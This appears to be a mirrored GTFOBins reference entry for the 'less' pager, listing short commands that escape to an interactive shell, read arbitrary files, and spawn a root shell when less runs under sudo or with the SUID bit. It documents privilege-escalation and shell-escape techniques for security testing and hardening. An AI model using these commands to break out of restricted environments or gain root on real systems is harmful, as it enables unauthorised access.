mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
21 lines
375 B
Markdown
21 lines
375 B
Markdown
---
|
|
functions:
|
|
execute-interactive:
|
|
- code: |
|
|
less /etc/profile
|
|
!/bin/sh
|
|
- code: |
|
|
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
|
|
v
|
|
file-read:
|
|
- code: less file_to_read
|
|
sudo-enabled:
|
|
- code: |
|
|
sudo less /etc/profile
|
|
!/bin/sh
|
|
suid-limited:
|
|
- code: |
|
|
./less /etc/profile
|
|
!/bin/sh
|
|
---
|